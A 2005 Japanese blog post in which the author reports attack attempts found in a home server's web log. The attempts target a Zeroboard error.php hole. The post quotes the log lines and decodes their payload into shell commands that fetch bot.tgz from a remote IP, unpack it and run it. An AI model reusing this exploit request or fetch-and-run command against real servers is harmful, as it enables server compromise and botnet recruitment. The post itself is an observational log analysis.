携帯URL


携帯にURLを送る

最近のトラックバック

@niftyが提供する
無料ブログはココログ
無料ブログはココログ

« ツルピカ液晶って…orz | トップページ | WindowsのDNS Clientサービスについて »

2005年10月15日 (土)

ゼロボードのセキュリティホールをついたアタック

 玄箱のWEBサーバに怪しげなログが残っていた。

211.253.183.58 - - [13/Oct/2005:14:35:44 +0900] "GET //bbs/skin/zero_vote/error.
php?dir=http://geocities.com/zamelmania/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20http:
//211.253.183.58/bot.tgz;tar%20xzvf%20bot.tgz;cd%20bot;./start HTTP/1.1" 404 227
211.253.183.58 - - [13/Oct/2005:14:35:45 +0900] "GET /board/skin/zero_vote/error
.php?dir=http://geocities.com/zamelmania/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20http
://211.253.183.58/bot.tgz;tar%20xzvf%20bot.tgz;cd%20bot;./start HTTP/1.1" 404 22
8
211.253.183.58 - - [13/Oct/2005:14:35:45 +0900] "GET /zboard/skin/zero_vote/erro
r.php?dir=http://geocities.com/zamelmania/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20htt
p://211.253.183.58/bot.tgz;tar%20xzvf%20bot.tgz;cd%20bot;./start HTTP/1.1" 404 2
29
211.253.183.58 - - [13/Oct/2005:14:35:45 +0900] "GET /zeroboard/bbs/skin/zero_vo
te/error.php?dir=http://geocities.com/zamelmania/fbi.gif?&cmd=cd%20/tmp;curl%20-
O%20http://211.253.183.58/bot.tgz;tar%20xzvf%20bot.tgz;cd%20bot;./start HTTP/1.1
" 404 236

 このゼロボードとやら、どうやら韓国産の掲示板ソフトウェアのようだ。そこで、ゼロボードがおいてありそうなパスをかたっぱしから試しているといったところか。見た感じでは、error.phpに外部から指定したコマンドを実行してしまうセキュリティホールが存在しているように思える。つまり、cmdパラメータに書かれた文字列をコマンドとして実行してしまうという極めて簡単なセキュリティホールだ…。

そのコマンドは
cd /tmp
curl -O http://211.253.183.58/bot.tgz
tar xzvf bot.tgz
cd bot
./start
といった内容で構成されている。

きっとbot.tgzに、ゾンビPC化させるスクリプトか何かが入っているのだろう。
まあ、玄箱にゼロボードなんて入ってないから関係ないけど。

投稿者 211 時刻 午後 01時26分 玄箱 |

« ツルピカ液晶って…orz | トップページ | WindowsのDNS Clientサービスについて »

コメント

コメントを書く



(ウェブ上には掲載しません)




トラックバック

この記事のトラックバックURL:
http://app.cocolog-nifty.com/t/trackback/96200/6408656

この記事へのトラックバック一覧です: ゼロボードのセキュリティホールをついたアタック:

» また変なの [_| ̄|○日記]
こちらにも似たようなのがきました。 URL等は違うけど、手口は同じです。 [続きを読む]

受信: 2005年11月 7日 (月) 午前 11時33分

» 未だDEFCON 3のまま、待機。 [お気楽アドミン]
この1週間はうちのサーバーの監視でちょっとお疲れ気味・・。 特に被害はでてないようなんだけど、 「LogWatch」に  Connection attempts using mod_proxy: 218.161.122.105 -> 211.150.96.25:25: 1 Time(s) なんて出た日にゃちょい焦ります・・。(‾o‾) 急いでサーバーのログを確認すると「405」のステータス・コード。 「mod_proxy:」はロードさせてないから大丈夫だとは思うけどね・・。 しかし、うちを踏み台にし... [続きを読む]

受信: 2005年11月17日 (木) 午後 11時41分

« ツルピカ液晶って…orz | トップページ | WindowsのDNS Clientサービスについて »